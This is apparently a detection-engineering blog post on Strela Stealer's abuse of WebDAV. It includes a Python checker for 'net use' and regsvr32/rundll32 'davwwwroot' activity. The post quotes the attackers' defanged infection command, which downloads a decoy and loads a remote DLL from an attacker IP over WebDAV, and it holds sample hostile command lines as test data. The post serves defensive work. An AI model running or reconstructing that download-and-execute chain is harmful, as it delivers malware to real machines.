043. Strela Stealer: Detecting WebDAV Abuse
Hello everyone! Have you ever seen adversaries use WebDAV servers to host malware? Yes, of course! So today we're going to look at detection opportunities related to such activity.
Let's look at a recent Strela Stealer infection chain, presented by Unit42. The threat actors distributed the stealer through email attachments: zip archives containing JS files.
So, the JS file executes the following script:
cmd /c powershell.exe -Command "Invoke-WebRequest -OutFile %temp%\\invoice.pdf hxxp[:]//193.143.1[.]205/invoice.php" && start %temp%\\invoice.pdf && cmd /c net use \\\\193.143.1[.]205@8888\\davwwwroot\\ && cmd /c regsvr32 /s \\\\193.143.1[.]205@8888\\davwwwroot\\281681957614368.dll
Ok, the threat actors abuse PowerShell, but not to download the malware: it is used to download and save a decoy document.
Next, the most interesting thing - using WebDAV. Here's what to look for:
- Execution of net with "use" and "davwwwroot" in the command line
- Execution of regsvr32 or rundll32 with "davwwwroot" in the command line
Quite easy, right?
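Here's how these two detection opportunities look as code. This is an added example, not part of the original post and not tooling from Unit42: a small Python checker that runs the two rules above over constructed process-creation events (the host 10.0.0.5 and the file names are placeholders, not the IOCs from the chain) and also pulls the WebDAV host and port out of the UNC path for enrichment. The UNC regex is an assumption based on the `\\host@port\davwwwroot\` form seen in the command line above, extended to the `@SSL` variant Windows also accepts.

```python
import re

# Constructed sample process-creation events (image path + command line).
# Not real telemetry; the host and file names are placeholders.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\net.exe",
     "cmdline": r"net use \\10.0.0.5@8888\davwwwroot\ "},
    {"image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r"regsvr32 /s \\10.0.0.5@8888\davwwwroot\payload.dll"},
    {"image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32 \\10.0.0.5@8888\davwwwroot\payload.dll,DllMain"},
    # Benign: ordinary SMB mapping, no davwwwroot token.
    {"image": r"C:\Windows\System32\net.exe",
     "cmdline": r"net use Z: \\fileserver\share /persistent:yes"},
    # Benign: regsvr32 against a local DLL.
    {"image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r"regsvr32 /s C:\Program Files\Vendor\component.dll"},
]

NET_IMAGES = {"net.exe", "net1.exe"}
LOADER_IMAGES = {"regsvr32.exe", "rundll32.exe"}

# \\host[@port|@SSL]\davwwwroot\ ... (assumed pattern; matched case-insensitively
# because Windows treats the DavWWWRoot token without regard to case).
WEBDAV_UNC = re.compile(
    r"\\\\(?P<host>[^\\@\s]+)(?:@(?P<port>ssl|\d+))?\\davwwwroot\\",
    re.IGNORECASE,
)


def image_name(path):
    """Return the lower-cased file name of a process image path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def net_use_webdav(event):
    """Rule 1: net/net1 with 'use' and 'davwwwroot' in the command line."""
    cmd = event["cmdline"]
    return (
        image_name(event["image"]) in NET_IMAGES
        and re.search(r"\buse\b", cmd, re.IGNORECASE) is not None
        and "davwwwroot" in cmd.lower()
    )


def lolbin_webdav_load(event):
    """Rule 2: regsvr32 or rundll32 with 'davwwwroot' in the command line."""
    return (
        image_name(event["image"]) in LOADER_IMAGES
        and "davwwwroot" in event["cmdline"].lower()
    )


def webdav_host(cmdline):
    """Extract (host, port-or-SSL-or-None) from the WebDAV UNC, for enrichment."""
    m = WEBDAV_UNC.search(cmdline)
    if not m:
        return None
    return m.group("host"), m.group("port")


def evaluate(events):
    """Run both rules over a list of events; return (rule, host_info, cmdline) hits."""
    hits = []
    for ev in events:
        if net_use_webdav(ev):
            hits.append(("net_use_webdav", webdav_host(ev["cmdline"]), ev["cmdline"]))
        if lolbin_webdav_load(ev):
            hits.append(("lolbin_webdav_load", webdav_host(ev["cmdline"]), ev["cmdline"]))
    return hits


if __name__ == "__main__":
    for rule, host_info, cmd in evaluate(SAMPLE_EVENTS):
        print(f"[{rule}] host={host_info} cmdline={cmd}")
```

Running it flags the three WebDAV events and leaves the two benign ones alone. In a real environment, the extracted host is the useful pivot: an external IP or an unknown host on port 8888 (or @SSL) behind `davwwwroot` deserves a look, whereas an internal SharePoint or WebDAV file server may need an allowlist to keep the rule quiet.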
See you tomorrow!